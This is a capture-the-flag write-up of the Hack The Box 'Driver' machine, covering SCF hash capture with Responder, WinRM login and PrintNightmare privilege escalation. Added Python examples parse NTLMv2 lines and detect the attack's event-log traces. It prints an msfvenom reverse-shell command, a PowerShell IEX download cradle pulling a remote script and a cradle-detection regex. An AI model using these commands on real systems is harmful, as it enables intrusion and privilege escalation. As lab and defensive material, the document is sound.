Hello everyone, I will be sharing my writeup for the HTB Driver machine, an easy Windows box. Starting off with nmap, we can see HTTP, SMB and WinRM services running on the box. Visiting the web server, it asked for credentials, which were easily guessable and allowed us to log in. The page showed that we can upload printer firmware, which was really a rabbit hole; uploading an SCF file instead allowed us to capture the NTLMv2 hash of a user, and after cracking it we were able to log in through WinRM on the machine. Since this is a machine about printers, and it was released when PrintNightmare (CVE-2021-34527) was found, using the PoC we got NT AUTHORITY\SYSTEM on the machine.
NMAP
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=MFP Firmware Update Center. Please enter password for admin
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
445/tcp open microsoft-ds syn-ack ttl 127 Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DRIVER; OS: Windows; CPE: cpe:/o:microsoft:windows
PORT 139/445 (SMB)
Checking the SMB shares through an anonymous login, it seems we don't have access to them, so let's move on to the web server.
PORT 80 (HTTP)
On visiting the web server, it asks for credentials, so let's try admin:admin to see if this works. And it did, so let's see what we have here.
It's running on PHP: I requested the index file with a .php extension and it loaded the page, so the site is written in PHP. Just some basic enumeration here. There are only two pages; the other page is about uploading firmware for the printer.
I tried uploading something, but it doesn't seem that I can access that file from anywhere, so I ran gobuster, and it also didn't find anything interesting.
Now I kept thinking, but nothing was coming to mind until I focused on these lines: "upload the respective firmware update to our file share". So maybe the file we upload here is going to an SMB share. Here I learned a new attack, known as the SCF (Shell Command File) attack.
So we need to create a .scf file; it will look like this:
Now we will have to upload this file and at the same time run Responder to catch the NTLMv2 hash:
responder -I tun0 -rdw -v
Just copy any one of the hashes; they are all the same, the only difference being the time (in seconds). Save the hash in a file and crack it with hashcat.
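To see why the captured lines differ only by time, it helps to look at what Responder actually writes. Each line is in hashcat's NTLMv2 format (USER::DOMAIN:server_challenge:NTProofStr:blob), and the blob is the NTLMv2_CLIENT_CHALLENGE structure from MS-NLMP, which carries a FILETIME timestamp and a per-authentication client challenge. The parser below is an added example, not part of this writeup or of Responder; the sample lines, the user name and the proof values are constructed placeholders, and the server challenge shown is the default 'Challenge' value from Responder.conf.

```python
"""Parse NTLMv2 responses in the format Responder writes (hashcat mode 5600):
USER::DOMAIN:server_challenge:NTProofStr:blob
and pull the timestamp and client challenge out of the blob.
The sample lines below are constructed for this example; they are not captures."""
from datetime import datetime, timedelta, timezone

FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def filetime_to_datetime(filetime: int) -> datetime:
    # FILETIME counts 100-nanosecond ticks since 1601-01-01 UTC
    return FILETIME_EPOCH + timedelta(microseconds=filetime // 10)


def datetime_to_filetime(when: datetime) -> int:
    return (when - FILETIME_EPOCH) // timedelta(microseconds=1) * 10


def parse_ntlmv2_line(line: str) -> dict:
    """Validate the six-field layout and decode the NTLMv2_CLIENT_CHALLENGE blob."""
    fields = line.strip().split(":")
    if len(fields) != 6 or fields[1] != "":
        raise ValueError("expected USER::DOMAIN:CHALLENGE:NTPROOFSTR:BLOB")
    user, _, domain, server_challenge, nt_proof, blob_hex = fields
    if len(server_challenge) != 16 or len(nt_proof) != 32:
        raise ValueError("server challenge must be 8 bytes and NTProofStr 16 bytes")
    blob = bytes.fromhex(blob_hex)
    # MS-NLMP 2.2.2.7: RespType(1) HiRespType(1) Reserved1(2) Reserved2(4)
    #                  TimeStamp(8) ChallengeFromClient(8) Reserved3(4) AvPairs(...)
    if len(blob) < 28 or blob[0] != 1 or blob[1] != 1:
        raise ValueError("blob is not an NTLMv2_CLIENT_CHALLENGE structure")
    return {
        "user": user,
        "domain": domain,
        "server_challenge": server_challenge.lower(),
        "nt_proof": nt_proof.lower(),
        "timestamp": filetime_to_datetime(int.from_bytes(blob[8:16], "little")),
        "client_challenge": blob[16:24].hex(),
    }


def seconds_between(line_a: str, line_b: str) -> float:
    """How far apart two captured responses are, per their embedded timestamps."""
    a, b = parse_ntlmv2_line(line_a), parse_ntlmv2_line(line_b)
    return abs((b["timestamp"] - a["timestamp"]).total_seconds())


# ---- constructed sample captures (placeholder user, proof values and challenges) ----
def build_blob(when: datetime, client_challenge: bytes) -> str:
    assert len(client_challenge) == 8
    blob = (bytes([1, 1]) + b"\x00" * 6
            + datetime_to_filetime(when).to_bytes(8, "little")
            + client_challenge
            + b"\x00" * 4            # Reserved3
            + b"\x00" * 4)           # empty AV_PAIR list (MsvAvEOL)
    return blob.hex()


RESPONDER_DEFAULT_CHALLENGE = "1122334455667788"   # 'Challenge' default in Responder.conf
T0 = datetime(2021, 10, 2, 10, 15, 0, tzinfo=timezone.utc)
SAMPLE_LINES = [
    "USER::DRIVER:" + RESPONDER_DEFAULT_CHALLENGE + ":" + "a" * 32 + ":"
    + build_blob(T0, b"\x01" * 8),
    "USER::DRIVER:" + RESPONDER_DEFAULT_CHALLENGE + ":" + "b" * 32 + ":"
    + build_blob(T0 + timedelta(seconds=3), b"\x02" * 8),
]

if __name__ == "__main__":
    for line in SAMPLE_LINES:
        info = parse_ntlmv2_line(line)
        print(info["user"], info["domain"], info["timestamp"].isoformat(), info["client_challenge"])
    print("seconds between captures:", seconds_between(*SAMPLE_LINES))
```

Because Responder hands out a fixed server challenge by default, the server-side half of every line is identical; the NTProofStr and blob change because the client embeds a fresh timestamp and client challenge on each authentication. That is also why the timestamp is useful on the defensive side: it tells you when the victim machine actually followed the link, which you can line up against share access logs.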
Now, to verify that we have valid creds, we can use crackmapexec to check them against SMB.
We only have read access here, so we can't get a shell using smbexec or psexec. Since WinRM is open (port 5985), we can check if we can get a shell with that.
It shows us the status "pwned", meaning that we can get a shell.
Privilege Escalation (Print Nightmare Python)
Assuming from the web page that there is a Print Spooler service running, we can test whether we can exploit PrintNightmare. This requires some setup, as we need to clone the specific impacket repo:
https://github.com/cube0x0/CVE-2021-1675
After cloning it, run python3 ./setup.py install, copy the contents of CVE-2021-1675.py, start the SMB server using service smbd restart, and generate a DLL reverse shell:
msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=10.10.14.125 LPORT=2222 -f dll -o /var/smb/shell.dll
Make sure that you have given read access on this file to the "other" permission class. Now launch the script and catch the shell:
PrintNightmare (PowerShell)
We can achieve SYSTEM on this machine through PowerShell as well, without the need to set up an SMB server. So we'll use this PoC for the PrintNightmare exploit:
https://github.com/calebstewart/CVE-2021-1675
After transferring it to the target machine, let's import the ps1 file. But if we try to import the script, it shows us the error "running scripts is disabled on this system". So to bypass this, we need to download the file using IEX:
IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.120/nightmare.ps1');
An advantage of downloading it this way is that it not only downloads the file but actually imports the script, so we don't have to import it manually.
Invoke-Nightmare -NewUser "USER" -NewPassword "PASS"
We can see that the user has been created, and we can then just switch to this user by logging in with evil-winrm.
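Both privilege-escalation paths above leave distinctive traces on the host: the impacket and PowerShell PoCs both end with the spooler installing a printer driver from somewhere other than its driver store (Windows logs this as event 316 in the PrintService log), the IEX cradle lands in PowerShell script block logging (event 4104), and Invoke-Nightmare's new local account produces a Security event 4720. The detector below is an added example written from the defender's side; it is not part of this writeup or of either PoC. The event records, their field names and the message text are constructed samples modelled on those three event types, and the PrintService/Admin channel name is assumed here.

```python
"""Flag the host-side traces that this writeup's privilege-escalation steps
leave behind: a printer driver added from an untrusted path (PrintNightmare)
and a PowerShell download-and-execute cradle, then correlate a new local
account created shortly after the cradle. Events below are constructed samples
in the shape of Windows event IDs 316, 4104 and 4720; field names are this
example's own."""
import re
from datetime import datetime, timedelta

EVENTS = [  # constructed; not logs from the Driver machine
    {"ts": "2021-10-02T10:19:40", "host": "DRIVER",
     "channel": "Microsoft-Windows-PrintService/Admin", "id": 316,
     "message": "Printer driver Microsoft Print To PDF for Windows x64 Version-3 was added or updated. "
                "Files:- mxdwdrv.dll, PrintConfig.dll. No user action is required."},
    {"ts": "2021-10-02T10:20:05", "host": "DRIVER",
     "channel": "Microsoft-Windows-PowerShell/Operational", "id": 4104,
     "message": "Creating Scriptblock text (1 of 1): Get-Service Spooler"},
    {"ts": "2021-10-02T10:20:09", "host": "DRIVER",
     "channel": "Microsoft-Windows-PowerShell/Operational", "id": 4104,
     "message": "Creating Scriptblock text (1 of 1): "
                "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.120/nightmare.ps1');"},
    {"ts": "2021-10-02T10:21:02", "host": "DRIVER",
     "channel": "Microsoft-Windows-PrintService/Admin", "id": 316,
     "message": "Printer driver 1234 for Windows x64 Version-3 was added or updated. "
                "Files:- C:\\Users\\Public\\nightmare.dll. No user action is required."},
    {"ts": "2021-10-02T10:21:30", "host": "DRIVER", "channel": "Security", "id": 4720,
     "message": "A user account was created. New Account: Account Name: USER"},
]

CRADLE_RE = re.compile(
    r"(?i)\b(iex|invoke-expression)\b.*\b(downloadstring|downloadfile|invoke-webrequest)\b")
FILES_RE = re.compile(r"Files:-\s*(.+?)(?:\.\s*No user action|$)")
SPOOL_DRIVER_DIR = "c:\\windows\\system32\\spool\\drivers\\"


def printer_driver_files(message: str) -> list:
    """Split the 'Files:- a.dll, b.dll' list out of an event 316 message."""
    m = FILES_RE.search(message)
    return [f.strip() for f in m.group(1).split(",") if f.strip()] if m else []


def suspicious_driver_file(path: str) -> bool:
    """Bare names resolve inside the spool driver store; a UNC path or a
    fully qualified path outside that store is worth an alert."""
    p = path.lower()
    if p.startswith("\\\\"):
        return True
    return "\\" in p and not p.startswith(SPOOL_DRIVER_DIR)


def detect(events, window=timedelta(minutes=10)):
    """Return (timestamp, host, alert) tuples in time order."""
    alerts = []
    last_cradle = {}  # host -> time of the most recent download cradle
    for e in sorted(events, key=lambda ev: ev["ts"]):
        t = datetime.fromisoformat(e["ts"])
        if e["id"] == 4104 and CRADLE_RE.search(e["message"]):
            alerts.append((e["ts"], e["host"], "powershell-download-cradle"))
            last_cradle[e["host"]] = t
        elif e["id"] == 316:
            bad = [f for f in printer_driver_files(e["message"]) if suspicious_driver_file(f)]
            if bad:
                alerts.append((e["ts"], e["host"],
                               "printer-driver-from-untrusted-path: " + ", ".join(bad)))
        elif e["id"] == 4720 and e["host"] in last_cradle:
            # a new local account right after a remote script was pulled and run
            if t - last_cradle[e["host"]] <= window:
                alerts.append((e["ts"], e["host"], "local-account-created-after-cradle"))
    return alerts


if __name__ == "__main__":
    for ts, host, alert in detect(EVENTS):
        print(ts, host, alert)
```

The driver-path rule is deliberately broad: the impacket variant points the spooler at a UNC share, while the PowerShell variant stages the DLL locally, and either shows up as a driver file outside the spool driver store. On the prevention side, the same Spooler that makes this writeup possible is the thing to switch off where a host does not print, and Point and Print driver installation should be restricted to administrators.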